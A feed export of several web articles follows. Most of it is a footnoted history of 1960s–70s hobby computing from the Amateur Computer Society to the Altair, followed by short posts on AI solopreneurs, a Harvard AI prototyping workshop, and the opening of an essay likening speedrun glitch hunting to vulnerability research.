The Early Electronics Hobby

A certain pattern of technological development recurred many times in the decades around the turn of the twentieth century: a scattered hobby community, tinkering with a new idea, develops it to the point where those hobbyists can sell it as a product. This sets off a frenzy of small entrepreneurial firms, competing to sell to other hobbyists and early adopters. Finally, a handful of firms grow to the point where they can drive down costs through economies of scale and put their smaller competitors out of business. Bicycles, automobiles, airplanes, and radio broadcasting all developed more or less in this way.

The personal computer followed this same pattern; indeed, it marks the very last time that a “high-tech” piece of hardware emerged from this kind of hobby-led development. Since that time, new hardware technology has typically depended on new microchips. That is a capital barrier far too high for hobbyists to surmount; but as we have seen, the computer hobbyists lucked into ready-made microchips created for other reasons, but already suited to their purposes.

The hobby culture that created the personal computer was historically continuous with the American radio hobby culture of the early twentieth-century, and, to a surprising degree, the foundations of that culture can be traced back to the efforts of one man: Hugo Gernsback. Gernsback (born Gernsbacher, to well-off German Jewish parents) came to the United States from Luxembourg in 1904 at the age of nineteen, shortly after his father’s death. Already fascinated by electrical equipment, American culture, and the fiction of Jules Verne and H.G. Wells, he started a business, the Electro Importing Company, in Manhattan, that offered both retail and mail-order sales of radios and related equipment. His company catalog evolved into a magazine, Modern Electrics, and Gernsback evolved into a publisher and community builder (he founded the Wireless Association of America in 1909 and the Radio League of America in 1915), a role he relished for the rest of his working life.[1]

Gernsback (foreground) giving an over-the-air lecture on the future of radio. From his 1922 book, Radio For All, p. 229.

The culture that Gernsback nurtured valued hands-on tinkering and forward-looking futurism, and in fact viewed them as two sides of the same coin. Science fiction (“scientifiction,” as Gernsback called it) writing and practical invention went hand in hand, for both were processes for pulling the future into the present. In a May 1909 article in Modern Electrics, for example, Gernsback opined on the prospects for radio communication with Mars: “If we base transmission between the earth and Mars at the same figure as transmission over the earth, a simple calculation will reveal that we must have the enormous power of 70,000 K. W. to our disposition in order to reach Mars,” and went on to propose a plan for building such a transmitter within the next fifteen or twenty years.

As science fiction emerged as its own genre with its own publications in the 1920s (many of them also edited by Gernsback), this kind of speculative article mostly disappeared from the pages of electronic hobby magazines. Gernsback himself occasionally dropped in with an editorial, such as a 1962 piece in Radio-Electronics on computer intelligence, but the median electronic magazine article had a much more practical focus. Readers were typically hobbyists looking for new projects to build or service technicians wanting to keep up with the latest hardware and industry trends.[2]

Nonetheless, the electronic hobbyists were always on the lookout for the new, for the expanding edge of the possible: from vacuum tubes, to televisions, to transistors, and beyond. It’s no surprise that this same group would develop an early interest in building computers. Nearly everyone who we find building (or trying to build) a personal or home computer prior to 1977 had close ties to the electronic hobby community.

The Gernsback story also highlights a common feature of hobby communities of all sorts. A subset of radio enthusiasts, seeing the possibility of making money by fulfilling the needs of their fellow hobbyists, started businesses to make new equipment for hobby projects, retail businesses to sell that equipment, or publishing businesses to keep the community informed on new equipment and other hobby news. Many of these enterprises made little or no money (at least at first), and were fueled as much by personal passion as by the profit motive; they were the work of hobby-entrepreneurs. It was this kind of hobby-entrepreneur who would first make personal computers available to the public.

The First Personal Computer Hobbyists

The first electronic hobbyist to take an interest in building computers, whom we know of, was Stephen Gray. In 1966, he founded the Amateur Computer Society (ACS), an organization that existed mainly to produce a series of quarterly newsletters typed and mimeographed by Gray himself. Gray has little to say about his own biography in the newsletter or in later reflections on the ACS. He reveals that he worked as an editor of the trade magazine Electronics, that he lived in Manhattan and then Darien, Connecticut, that he had been trying to build a computer of his own for several years, and little else. But he clearly knew the radio hobby world. In the fourth, February 1967, number of his newsletter, he floated the idea of a “Standard Amateur Computer Kit” (SACK) that would provide an economical starting point for new hobbyists, writing that,[3]

Amateur computer builders are now much like the early radio amateurs. There’s a lot of home-brew equipment, much patchwork, and most commercial stuff is just too expensive. The ACS can help advance the state of the amateur computer art by designing a standard amateur computer, or at least setting up the specs for one. Although the mere idea of a standard computer makes the true blue home-brew types shudder, the fact is that amateur radio would not be where it is today without the kits and the off-the-shelf equipment available.[4]

By the Spring of 1967, Gray had found seventy like-minded members through advertisements in trade and hobby publications, most of them in the United States, but a handful in Canada, Europe, and Japan. We know little about the backgrounds or motivations of these men (and they were exclusively men), but when their employment is mentioned, they are found at major computer, electronics, or aerospace firms; at national labs; or at large universities. We can surmise that most worked with or on computers as part of their day job.

A few letter writers disclose prior involvement in hobby electronics and radio, and from the many references to attempts to imitate the PDP-8 architecture, we can also guess that many members had some association with DEC minicomputer culture. It is speculative but plausible to guess that the 1965 release of the PDP-8 might have instigated Gray’s own home computer project and the later creation of the ACS. Its relatively low price, compact size, and simple design may have catalyzed the notion that home computers lay just out of reach, at least for Gray and his band of like-minded enthusiasts.

Whatever their backgrounds and motivations, the efforts of these amateurs to actually builda computer proved mostly fruitless in these early years. The January 1968 newsletter reported a grand total of two survey respondents who possessed an actual working computer, though respondents as a whole had sunk an average of two years and $650 on their projects ($6,000 in 2024 dollars). The problem of assembling one’s own computer would daunt even the most skilled electronic hobbyist: no microprocessors existed, nor any integrated circuit memory chips, and indeed virtually no chips of any kind, at least at prices a “homebrewer” could afford.

Both of the two complete computers reported in the survey were built from hand-wired transistor logic. One was constructed from the parts of an old nuclear power system control computer, PRODAC IV. Jim Sutherland took the PRODAC’s remains home from his work at Westinghouse after its retirement, and re-dubbed it the ECHO IV (for Electronic Computing Home Operator). Though technically a “home” computer, to borrow an existing computer from work was not a path that most would-be home-brewers could follow. This hardly had the makings of a technological revolution. The other complete “computer,” the EL-65 by Hans Ellenberger of Switzerland, on the other hand, was truly an electronic desktop calculator; it could perform arithmetic ably enough, but could not be programmed. [5]

The Emergence of the Hobby-Entrepreneur

As integrated circuit technology got better and cheaper, the situation for would-be computer builders gradually improved. By 1971, the first, very feeble, home computer kits appeared on the market, the first signs of Gray’s “SACK.” Though neither used a microprocessor, they took advantage of the falling prices of integrated circuits: the CPU of each consisted of dozens of small chips wired together. The first was the National Radio Institute (NRI) 832, the hardware accompaniment to a computer technician course disseminated by the NRI, and priced at about $500. Unsurprisingly, the designer, Lou Freznel, was a radio hobby enthusiast, and a subscriber to Stephen Gray’s ACS Newsletter. But the NRI 832 is barely recognizable as a functional computer: it had a measly sixteen 8-bit words of read-only memory, configured by mechanical switches (with an additional sixteen bytes of random-access memory available for purchase).[6]

The NRI 832. The switches on the left were used to set the values of the bits in the tiny memory. The banks of lights at the top left and right, showing the binary values of the program counter and accumulator, were the only form of output  [vintagecomputer.net]

The $750 Kenbak-1 that appeared the same year was nominally more capable, with 256 bytes of memory, though implemented with shift-register chips (accessible one bit at a time), not random-access memory. Indeed, the entire machine had a serial-processing architecture, processing only one bit at a time through the CPU, and ran at only about 1,000 instructions per second—very slow for an electronic computer. Like the NRI 832, it offered only switches as input and only a small panel of display lights for showing register contents as output. Its creator, John Blankenbaker, was a radio lover from boyhood before enrolling as an electronics technician in the Navy. He began working on computers in the 1950s, beginning with the Bureau of Standards SEAC. Intrigued by the possibility of bringing a computer home, he tinkered with spare parts for making his own computer for years, becoming his own private ACS. By 1971 he thought he had a saleable device that could be used for teaching programming, and he formed the eponymous “Kenbak” company to sell it.[7]

Blankenbaker was the first of the amateur computerists to try to bring his passion to market; the first hobby-entrepreneur of the personal computer. He was not the most successful. I found no records of the sales of the NRI 832, but by Blankenbaker’s own testimony, only forty-four Kenbak-Is were sold. Here were home computer kits readily available at a reasonable price, four years before Altair. Why did they fall flat? As we have seen, most members of the Amateur Computer Society had aimed to make a PDP-8 or something like it; this was the most familiar computer of the 1960s and early 1970s, and provided the mental model for what a home computer could and should be. The NRI 832 and Kenbak-I came nowhere close to the capabilities of a PDP-8, nor were they designed to be extensible or expandable in any way that might allow them to transcend their basic beginnings. These were not machines to stir the imaginative loins of the would-be home computer owner.

Hobby-Entrepreneurship in the Open

These early, halting steps towards a home computer, from Stephen Gray to the Kenbak-I, took place in the shadows, unknown to all but a few, the hidden passion of a handful of enthusiasts exchanging hand-printed newsletters. But several years later, the dream of a home computer burst into the open in a series of stories and advertisements in major hobby magazines. Microprocessors had become widely available. For those hooked on the excitement of interacting one-on-one with a computer, the possibility of owning their own machine felt tantalizing close. A new group of hobby-entrepreneurs now tried to make their mark by providing computer kits to their fellow enthusiasts, with rather more success than NRI and Kenbak.

The overture came in the fall of 1973, with Don Lancaster’s “TV Typewriter,”, featured on the cover of the September issue of Radio-Electronics (a Gernsback publication, though Gernsback himself was, by then, several years dead). Lancaster, like most of the people we have met in this chapter, was an amateur “ham” radio operator and electronics tinkerer. Though he had a day job at Goodyear Aerospace in Phoenix, Arizona, he figured out how to make a few extra bucks from his hobby by publishing projects in magazines and selling pre-built circuit boards for those projects via a Texas hobby firm called Southwest Technical Products (SWTPC).

The 1973 Radio-Electronics TV Typewriter cover.

His TV Typewriter was, of course, not a computer at all, but the excitement it generated certainly derived from its association with computers. One of many obstacles to a useful home computer was the lack of a practical output device: something more useful than the handful of glowing lights that the Kenbak-I sported, but cheaper and more compact than the then-standard computer input/output device, a bulky teletype terminal. Lancaster’s electronic keyboard, which required about $120 in parts, could hook up to an ordinary television and turn it into a video text terminal, displaying up to sixteen lines of thirty-two characters each. Shift-registers continued to be the only cheap form of semiconductor memory, and so that was what Lancaster used for storing the characters to be displayed on screen. Lancaster gave the parts list and schematic to the TV Typewriter away for free, but made money by selling pre-built subassemblies via SWTPC that saved buyers time and effort, and by publishing guidebooks likethe TV Typewriter Cookbook.[8]

The next major landmark appeared six months later in a ham radio magazine, QST, named after the three-letter ham code for “calling all stations.” A small ad touted the availability of “THE TOTALLY NEW AND THE VERY FIRST MINI-COMPUTER DESIGNED FOR THE ELECTRONIC/COMPUTER HOBBYIST” with kit prices as low as $440. This was the SCELBI 8-H, the first computer kit based around a microprocessor, in this case the Intel 8008. Its creator, Nat Wadsworth, lived in Connecticut, and became enthusiastic about the microprocessor after attending a seminar given by Intel in 1972, as part of his job as an electrical engineer at an electronics firm. Wadsworth was another ham radio enthusiast, and already enough of a personal computing obsessive to have purchased a surplus DEC PDP-8 at a discount for home use (he paid “only” $2,000, about $15,000 in 2024 dollars). Since his employer did not share his belief in the 8008, he looked for another outlet for his enthusiasm, and teamed up with two other engineers to develop what became the SCELBI-8H (for SCientific ELectronic BIological). Their ads drew thousands of responses and hundreds of orders over the following months, though they ended up losing money on every machine sold.[9]

A similar machine appeared several months later, this time as a hobby magazine story, on the cover the July 1974 issue of Radio-Electronics: “Build the Mark-8 Minicomputer,” ran the headline (notice again the “minicomputer” terminology: a PDP-8 of one’s own remained the dream). The Mark-8 came from Jonathan Titus, a grad student from Virginia, who had built his own 8008-based computer and wanted to share the design with the rest of the hobby. Unlike SCELBI, he did not sell it as a complete machine or even a kit: he expected the Radio-Electronics reader to buy and assemble everything themselves. That is not to say that Titus made no money: he followed a hobby-entrepreneur business model similar to Don Lancaster’s, offering an instructional guidebook for $5, and making some pre-made boards available for sale through a retailer in New Jersey, Techniques, Inc.

The 1974 Mark-8 Radio-Electronics cover.

The SCELBI-8H and Mark-8 looked much more like a “real” minicomputer than the NRI 832 or Kenbak-I. A hobbyist hungry for a PDP-8-like machine of their own could recognize in this generation of machines something edible, at least. Both used an eight-bit parallel processor, not an antiquated bit-serial architecture, came with one kilobyte of random-access memory, and were designed to support textual input/output devices. Most importantly both could be extended with additional memory or I/O cards. These were computers you could tinker with, that could become an ongoing hobby project in and of themselves. A ham radio operator and engineering student in Austin, Texas named Terry Ritter spent over a year getting his Mark-8 fully operational with all of the accessories that he wanted, including an oscilloscope display and cassette tape storage.[10]

In the second half of 1974, a community of hundreds of hobbyists like Ritter began to form around 8008-based computers, significantly larger than the tiny cadre of Amateur Computer Society members. In September 1974, Hal Singer began publishing the Mark-8 User Group Newsletter (later renamed the Micro-8 Newsletter) for 8008 enthusiastsout of his office at the Cabrillo High School Computer Center in Lompoc, California. He attracted readers from all across the country: California and New York, yes, but also Iowa, Missouri, and Indiana. Hal Chamberlain started the Computer Hobbyist newsletter two months later. Hobby entrepreneurship expanded around the new machines as well: Robert Suding formed a company in Denver called the Digital Group to sell a packet of upgrade plans for the Mark-8.[11]

The first tender blossoms of a hobby computer community had begun to emerge. Then another computer arrived like a spring thunderstorm, drawing whole gardens of hobbyists up across the country and casting the efforts of the likes of Jonthan Titus and Hal Singer in the shade. It, too, came as a response to the arrival of the Mark-8, by a rival publication in search of a blockbuster cover story of their own.

Altair Arrives

Art Salsberg and Les Solomon, editors at Popular Electronics, were not oblivious to the trends in the hobby, and had been on the lookout for a home computer kit they could put on their cover since the appearance of the TV Typewriter in the fall of 1973. But the July 1974 Mark-8 cover story at rival Radio-Electronics threw a wrench in their plans: they had an 8008-based design of their own lined up, but couldn’t publish something that looked like a copy-cat machine. They needed something better, something to one-up the Mark-8. So, they turned to Ed Roberts. He had nothing concrete, but had pitched Solomon a promise that he could build a computer around the new, more powerful Intel 8080 processor. This pitch became Altair—named, according to legend, by Solomon’s daughter, after the destination of the Enterprise in the Star Trek episode “Amok Time”—and it set the hobby electronics world on fire when it appeared as the January 1975 Popular Electronics cover story.

The famous Popular Electronics Altair cover story.

Altair, it should be clear by now, was continuous with what came before: people had been dreaming of and hacking together home computers for years, and each year the process became easier and more accessible, until by 1974 any electronics hobbyist could order a kit or parts for a basic home computer for around $500. What set the Altair apart, what made it special, was the sheer amount of power it offered for the price, compared to the SCELBI-8H and Mark-8. The Altair’s value proposition poured gasoline onto smoldering embers, it was an accelerant that transformed a slowly expanding hobby community into a rapidly expanding industry.

The Altair’s surprising power derived ultimately from the nerve of MITS founder Ed Roberts. Roberts, like so many of his fellow electronics hobbyists, had developed an early passion for radio technology that was honed into a professional skill by technical training in the U.S. armed forces—the Air Force, in Roberts’ case. He founded Micro Instrumentation and Telemetry Systems (MITS) in Albuquerque with fellow Air Force officer Forrest Mims to sell electronic telemetry modules for model rockets. A crossover hobby-entrepreneur business, this straddled two hobby interests of the founders, but did not prove very profitable. A pivot in 1971 to sell low-cost kits to satiate the booming demand for pocket calculators, on the other hand, proved very successful—until it wasn’t. By 1974 the big semiconductor firms had vertically integrated and driven most of the small calculator makers out of business.

For Roberts, the growing hobby interest in home computers offered a chance to save a dying MITS, and he was willing to bet the company on that chance. Though already $300,000 in debt, he secured a loan of $65,000 from a trusting local banker in Albuquerque, in September 1974. With that money, he negotiated a steep volume discount from Intel by offering to buy a large quantity of “ding-and-dent” 8080 processors with cosmetic damage. Though the 8080 listed for $360, MITS got them for $75 each. So, while Wadsworth at SCELBI (and builders assembling their own Mark-8s) were paying $120 for 8008 processors, MITS was paying nearly half that for a far better processor.[12]

It is hard to overstate what a substantial leap forward in capabilities the 8080 represented: it ran much faster than the 8008, integrated more capabilities into a single chip (for which the 8008 required several auxiliary chips), could support four times as much memory, and had a much more flexible 40-pin interface (versus the 18 pins on the 8008). The 8080 also referenced a program stack an external memory, while the 8008 had a strictly size-limited on-CPU stack, which limited the software that could be written for it. The 8080 represented such a large leap forward that, until 1981, essentially the entire personal and home computer industry ran on the 8080 and two similar designs: the Zilog Z80 (a processor that was software-compatible with the 8080 but ran at higher speeds), and the MOS Technology 6502 (a budget chip with roughly the same capabilities as the 8080).[13]

The release of the Altair kit at a total price of $395 instantly made the 8008-based computers irrelevant. Nat Wadsworth of SCELBI reported that he was “devastated by appearance of Altair,” and “couldn’t understand how it could sell at that price.” Not only was the price right, the Altair also looked more like a minicomputer than anything before it. To be sure, it came standard with a measly 256 bytes of memory and the same “switches and lights” interface as the ancient kits from 1971. It would take quite a lot of additional money and effort to turn into a fully functional computer system. But it came full of promise, in a real case with an extensible card slot system for adding additional memory and input/output controllers. It was by far the closest thing to a PDP-8 that had ever existed at a hobbyist price point—just as the Popular Electronics cover claimed: “World’s First Minicomputer Kit to Rival Commercial Models.” It made the dream of the home computer, long cherished by thousands of computer lovers, seem not merely imminent, but immanent: the digital divine made manifest. And this is why the arrival of the MITS Altair, not of the Kenbak-I or the SCELBI-8H, is remembered as the founding event of the personal computer industry.[14]

All that said, even a tricked-out Altair was hardly useful, in an economic sense. If pocket calculators began as a tool for business people, and then became so cheap that people bought them as a toy, the personal computer began as something so expensive and incapable that only people who enjoyed them as a toy would buy them. Next time, we will look at the first years of the personal computer industry: a time when the hobby computer producers briefly flourished and then wilted, mostly replaced and outcompeted by larger, more “serious” firms. But a time when the culture of the typical computer user remained very much a culture of play.

Appendix: Micral N, The First Useful Microcomputer

There is another machine sometimes cited as the first personal computer: the Micral N. Much like Nat Wadsworth, French engineer François Gernelle was smitten with the possibilities opened up by the Intel 8008 microprocessor, but could not convince his employer, Intertechnique, to use it in their products. So, he joined other Intertechnique defectors to form Réalisation d’Études Électroniques (R2E), and began pursuing some of their erstwhile company’s clients.

In December 1972, R2E signed an agreement with one of those clients, the Institut National de la Recherche Agronomique (INRA, a government agronomical research center), to deliver a process control computer for their labs at fraction of the price of a PDP-8. Gernelle and his coworkers toiled through the winter in a basement in the Paris suburb of Châtenay-Malabry to deliver a finished system in April 1973, based on the 8008 chip and offered at a base price of 8,500 francs, about $2,000 in 1973 dollars (one fifth the going rate for a PDP-8).[15]

The Micral N was a useful computer, not a toy or a plaything. It was not marketed and sold to hobbyists, but to organizations in need of a real-time controller. That is to say, it served the same role in the lab or factory floor that minicomputers had served for the previous decade. It can certainly be called a microcomputer by dint of its hardware. But the Altair lineage stands out because it changed how computers were used and by whom; the microprocessor happened to make that economically possible, but it did not automatically make every machine into which it was placed a personal computer.

The Micral N looks very much like the Altair on the outside, but was marketed entirely differently [Rama, Cc-by-sa-2.0-fr].

Useful personal computers would come, in time. But the demand that existed for a computer in one’s own home or office in the mid-1970s came from enthusiasts with a desire to tinker and play on a computer, not to get serious business done on one. No one had yet written and published the productivity software that would even make a serious home or office computer conceivable. Moreover, it was still far too expensive and difficult to assemble a comprehensive office computer system (with a display, ample memory, and external mass storage for saving files) to attract people who didn’t already love working on computers for their own sake.

Until these circumstances  changed, which would take several years, play reigned unchallenged among home computer users. The Micral N is an interesting piece of history, but it is an instructive contrast with the story of the personal computer, not a part of it.


[1] Grant Wythoff, ed., The Perversity of Things: Hugo Gernsback on Media, Tinkering, and Scientifiction (Minneapolis: University of Minnesota Press, 2016), 11-16; Keith Massie and Stephen D. Perry, “Hugo Gernsback and Radio Magazines:

An Influential Intersection in Broadcast History,” Journal of Radio Studies 9, 2 (2002), 264-281.

[2] Hugo Gernsback, “Are Thinking Computers Possible,” Radio-Electronics (August 1962), 25.

[3] Stephen Gray, “The Early Days of Personal Computers”, Creative Computing 10, 11 (November 1984), 6.

[4] Stephen Gray, “Standard Amateur Computer Kit,” ACS Newsletter no. 4 (February 1967), 4. The reference to “home-brew” is interesting, and would recur in the famous Bay Area Homebrew Computer Club. Though technically illegal until 1978 (and illegal in many states for years thereafter), home-brewed beer was becoming increasingly popular in the United States in the 1960s; the amateur computerists clearly felt some affinity between their work and this other semi-illicit hobby.

[5] “ACS Computer Survey Results,” ACS Newsletter no. 8, January 1968; Dave Cortesi, “The First Home Computer,” Computer History Museum Volunteer Information Exchange 5, 8 (September 11, 2015), 2-3.

[6] “NRI-832”, Old Computer Museum, https://www.oldcomputermuseum.com/nri_832.html; William G. Wong, “Remembering a Communications Legend,” Electronic Design (January 19, 2023), https://www.electronicdesign.com/blogs/altembedded/article/21258411/electronic-design-remembering-a-communications-legend; Lou Freznel, “The History of Personal Computers – Part 1: The East Coast Version,” Electronic Design (December 12, 2013), https://www.electronicdesign.com/technologies/industrial/systems/article/21798814/the-history-of-personal-computers-part-1-the-east-coast-version

[7] Lee Felsenstein, “Oral History of John Blankenbaker,” Computer History Museum (June 14, 2007).

[8] Don Lancaster, “The Way Things Were,” Blatant Opportunist 63 (July-August 2001), 1-5; Don Lancaster, “TV Typewriter,” Radio-Electronics (September 1973), 43-52.

[9] “The history of SCELBI as told by Nat Wadsworth,” Scelbi Computer Museum, https://www.scelbi.com/history-by-nat; “interview with Jack Rubin,” Scelbi History Museum, https://www.scelbi.com/history-jack-rubin-interview; “SCELBI Computer Consulting, Inc.,” QST (March 1974), 154.

[10] Terry Ritter, “A Mark-8 Experience,” Ciphers by Ritter, February 21, 2002, http://www.ciphersbyritter.com/MARK8/MARK8.HTM

[11] Mark-8 User Group Newsletter 1, 1 (archived at Bryan’s Old Computers (https://bytecollector.com/archive/mark_8/My_Mark-8_Info/Newsletters/Micro-8_Newsletter/Micro-8_Vol-1_all_issues.PDF ); “The Digital Group,” Bryan’s Old Computers, February 20024, https://bytecollector.com/the_digital_group.htm

[12] Freiberger and Swaine, Fire in the Valley, 37-45.

[13] On the 8080 vs 8008 see “Intel 8080,” Wikipedia, https://en.wikipedia.org/wiki/Intel_8080. On the dominant processors of the late 1970s, see “6502, Z80, 8086, 68000: the four CPUs that dominated the 1980s,”  https://www.iljitsch.com/2022/04-19-6502-z80-8086-68000-the-four-cpus-that-dominated-the-1980s.html.

[14] “interview with Jack Rubin,” Scelbi History Museum, https://www.scelbi.com/history-jack-rubin-interview.

[15] François Gernelle, “La Naissance du Premier Micro-Ordinateur: Le Micral N,” in Philippe Chatelin and Pierre E. Mounier-Kuhn, eds., Deuxième Colloque sur l’Histoire de l’Informatique en France, v. 1 (Paris: Conservatoire

National des Arts et Métiers, 1990), 97-101.

]]>
https://technicshistory.com/2025/02/22/from-acs-to-altair-the-rise-of-the-hobby-computer/ hacker-news-small-sites-43233137 Sun, 02 Mar 2025 18:04:16 GMT
<![CDATA[The Era of Solopreneurs Is Here]]> thread link) | @QueensGambit
March 2, 2025 | https://manidoraisamy.com/developer-forever/post/the-era-of-solopreneurs-is-here.anc-52867368-2029-4dc5-a7da-ece853a648b5.html | archive.org

DeepSeek just dropped a bombshell: $200M in annual revenue with a 500%+ profit margin—all while charging 25x less than OpenAI. But DeepSeek didn’t just build another AI model. They wrote their own parallel file system (3FS) to optimize costs—something that would have been unthinkable for a company of their size. This was possible because AI helped write the file system. Now, imagine what will happen in a couple of years—AI will be writing code, optimizing infrastructure, and even debugging itself. An engineer with AI tool can now outbuild a 100-person engineering team.

Disappearing Pillars


For years, the freemium business model, cloud computing, and AI have been converging. First, the internet killed the need for sales teams (distribution moved online). Then, serverless computing eliminated IT teams (AWS, Firebase, you name it). And now, AI is breaking the last barrier—software development itself. This shift has been happening quietly for 15 years, but AI is the final straw that breaks the camel’s back.

This kind of disruption was previously limited to narrow consumer products like WhatsApp, where a 20-member team built a product that led to a $19 billion exit. But now, the same thing is happening in business applications that requires breadth. AI will be able to build complex applications that were previously impossible for small teams. Take our own experience: Neartail competes with Shopify and Square, and it’s built by one person. Formfacade is a CRM that competes with HubSpot—built by one person. A decade ago, this wouldn’t have been possible for us. But today, AI handles onboarding, customer support, and even parts of development itself. So, what does this mean for SaaS? It won’t disappear, but it’s about to get a whole lot leaner.

Double Threat to Big Companies

For large incumbents, this shift isn’t just about new competition—it’s a fundamental restructuring of how software businesses operate. They face a double threat:

  1. They must cut down their workforce, even if employees are highly skilled, creating a moral dilemma.
  2. They have to rebuild their products from scratch for the AI era - a challenge for elephants that can't dance.

Look at payments, for example. Stripe charges 3% per transaction. We’re rolling out 2% fees for both payments and order forms because we use AI to read the seller’s SMS and automate the payment processing. It won’t hurt Stripe now—they make billions off Shopify’s transaction fees alone. But it’s a slow rug pull. First, AI-first companies like us will nibble away Shopify's revenue. Then, a few will break through and topple Shopify. And, only then will incumbents like Stripe feel the pinch as a second order effect.

Summary

This is a massive opportunity for startups right now. While the giants are trapped in their own complexity, nimble teams can build and launch AI-native solutions that directly challenge established players. Target a bloated SaaS vertical, rebuild it from the ground up with AI at its core, and position it as the next-generation alternative.

For example, the future of CRM isn’t just software—it’s software + sales team. Startups that don’t want to hire salespeople will eagerly adopt AI-driven CRMs that automate outreach, and follow-ups. Meanwhile, large companies will hesitate to fire their sales teams or switch from legacy CRMs due to vendor lock-in. But over time, startups using AI-native CRMs will scale into large companies themselves, forcing the laggards to transition or fall behind.

This is why we say, “The future is here, but not evenly distributed.” The AI-native solutions of today will become the default for the next wave of large enterprises. The opportunity isn’t in building software for existing companies—it’s in building it for the startups that will replace them. For founders starting companies today, this is Day Zero in the truest sense. The AI-native companies being built now are the ones that will define the next decade of SaaS. It’s not just disruption—it’s a complete reset.

]]>
https://manidoraisamy.com/developer-forever/post/the-era-of-solopreneurs-is-here.anc-52867368-2029-4dc5-a7da-ece853a648b5.html hacker-news-small-sites-43232999 Sun, 02 Mar 2025 17:52:48 GMT
<![CDATA[ChatGPT Rickrolls Harvard Business School Student]]> thread link) | @johnys
March 2, 2025 | https://blog.johnys.io/the-tech-is-not-the-moat-what-39-harvard-mbas-taught-me-about-ai-startup-building-and-10x-founders/ | archive.org

ChatGPT

I keep being impressed by the new ways I see people using AI and how these ideas have yet to go mainstream.

November 2024, Professor Jeff Bussgang, Professor Christina Wallace, and I taught a hands-on workshop in the Launching Technology Ventures (LTV) class at Harvard Business.

The goal was to have students, especially those non-technical, go from -1 to 0 taking a startup idea, building a lean canvas, and launching a first prototype all with AI.

What I didn’t expect was how much the students would teach us about the changing nature of technical advantage in startups. As one student put it:

"The tech is not the moat!"

A few of my favorite quotes about the impact of the workshop:

"I really wish I had known about these tools when I started working on my startup a few months ago."
"This exercise convinced me that if you're performing ideation and not using AI tools in the process, you're handicapping yourself unnecessarily. AI dramatically improves the process every single step of the way and is an invaluable tool."
"More than ever I'm convinced that even as someone with technical training I either have to learn these tools or perish."

One student was even rickrolled by ChatGPT!

"In the first iteration of my landing page, ChatGPT added the music video for ‘Never Gonna Give You Up’ by Rick Astley under the heading "See Soar in Action"...something you'd definitely want to watch out for."

(I had to double-check her conversation on that one to verify that for myself!)

You can read the detailed takeaways in Professor Bussgang's article here:

How to Teach Using AI to Enable 10x Founders—even non-technical ones—in the Product Market Fit Journey

You can see the student results here:

HBS AI Showcase - Launching Technology Ventures

Harvard Business School AI Showcase of student projects for Launching Technology Ventures Autumn 2024 class. Taught by Jeff Bussgang, Christina Wallace, Jero Beccar, and John Yang-Sammataro.

And if you want to try it out for yourself, here's the open-source version of the exercise:

Prototyping with AI Workshop - Harvard Business School - Launching Technology Ventures - Fall 2024

Professor Bussgang also goes into more detail about how some of the latest AI implications from our class apply to timeless strategies and tactics to finding product market fit in his new book The Experimentation Machine Finding Product-Market Fit in the Age of AI:

The Experimentation Machine: Finding Product-Market Fit in the Age of AI: Bussgang, Jeffrey J: 9781962339087: Amazon.com: Books

The Experimentation Machine: Finding Product-Market Fit in the Age of AI [Bussgang, Jeffrey J] on Amazon.com. *FREE* shipping on qualifying offers. The Experimentation Machine: Finding Product-Market Fit in the Age of AI

Shop the Store on Amazon ›Follow

We're doing a second iteration of the class workshop in March 2025. AI is moving so quickly. I'm excited to see how tools evolve and how we change the workshop along with them.

If you have questions, comments, or feedback, drop me a line!

]]>
https://blog.johnys.io/the-tech-is-not-the-moat-what-39-harvard-mbas-taught-me-about-ai-startup-building-and-10x-founders/ hacker-news-small-sites-43232942 Sun, 02 Mar 2025 17:46:55 GMT
<![CDATA[Speedrunners are vulnerability researchers, they just don't know it yet]]> thread link) | @chc4
March 2, 2025 | https://zetier.com/speedrunners-are-vulnerability-researchers/ | archive.org

/nl_img1

Thousands of video game enthusiasts are developing experience in the cybersecurity industry by accident. They have a fun hobby, pouring over the details of their favorite games, and they don't know they could be doing something very similar… by becoming a vulnerability researcher.

That probably requires some backstory, especially from a cybersecurity company's blog!

What's a speedrun?

Basically as soon as video games were released, people have been trying to beat them faster than their friends (or enemies) can. Gamers will do this for practically any game on the planet – but the most popular games, or the ones with the most cultural weight and cultish following, naturally end up with the fiercest competition. Speedrunners will run through their favorite game hundreds or thousands of times in order to get to get to the top of community-driven leaderboards for the fastest time… which puts incentives on that video game's community to find the absolute fastest way to clear the game, no matter how strange.

"Any percent" speedruns, or "any%" more commonly, are usually one of the most popular categories of speedrun for any given game. In it, all rules are off and no weird behavior is disallowed: intentionally triggering bugs in the game, which the developers never intended for the players to be able to perform, often have the potential to shave double-digit percentages of time off existing routes by cutting out entire swathes of the game from having to be played at all. Why do 1 -> 2 -> 3 if you can do a cool trick and skip from 1 -> 3 directly?

A lot of these glitches revolve around extremely precise movement… but for the most dedicated fans, they'll go even further.

Glitch hunting is reverse engineering

Entire groups will spring up inside a game's speedrunning community dedicated to discovering new glitches, and oftentimes they'll apply engineering to it.

These enthusiasts won't just try weird things in the game over and over (although that definitely helps!) – they'll use tools that are standard in the cybersecurity industry to pull apart how software works internally, such as IDA Pro or Ghidra, to discover exactly what makes their target video game tick. On top of static analysis, they'll leverage dynamic analysis as well: glitch hunters will use dynamic introspection and debugging tools, like the Dolphin Emulator’s memory viewer or Cheat Engine, to get a GDB-like interface for figuring out the program's internal data structures and how information is recorded.

And even further, they'll develop entirely new tooling: I've seen groups like the Paper Mario: The Thousand Year Door community reverse engineer game file formats and create Ghidra program loaders, or other groups completely re-implement Ghidra disassembled code in C so they can stick it under a fuzzer in isolation. Some of the speedrun glitch hunters are incredibly technically competent, using the exact same tooling and techniques that people in the cybersecurity industry use for reverse engineering every day.

…And it’s vulnerability research

Not only do these groups do reverse engineering, but they also are doing vulnerability research. Remember, they don't only try to figure out how games work, but they try to break the game in any way possible. These glitches end up looking stunningly similar to how memory corruption exploits work for any other computer program: they'll find buffer overflows, use-after-frees, and incorrect state machine transitions in their target games.

And perhaps most impressively, they'll productize their exploits, unlike a lot of people in the cybersecurity industry. Some vulnerability researchers will develop a proof-of-concept to demonstrate a bug – but never actually develop the technical chops on how that exploit would need to be developed further for an adversary to use it. They might intellectually know how to weaponize a buffer overflow, or a use-after-free, but speedrunning groups by necessity are actually doing it. Oftentimes, actually using these glitches requires working through extremely restrictive constraints, both for what inputs they have control over and what parts of the program they can influence.

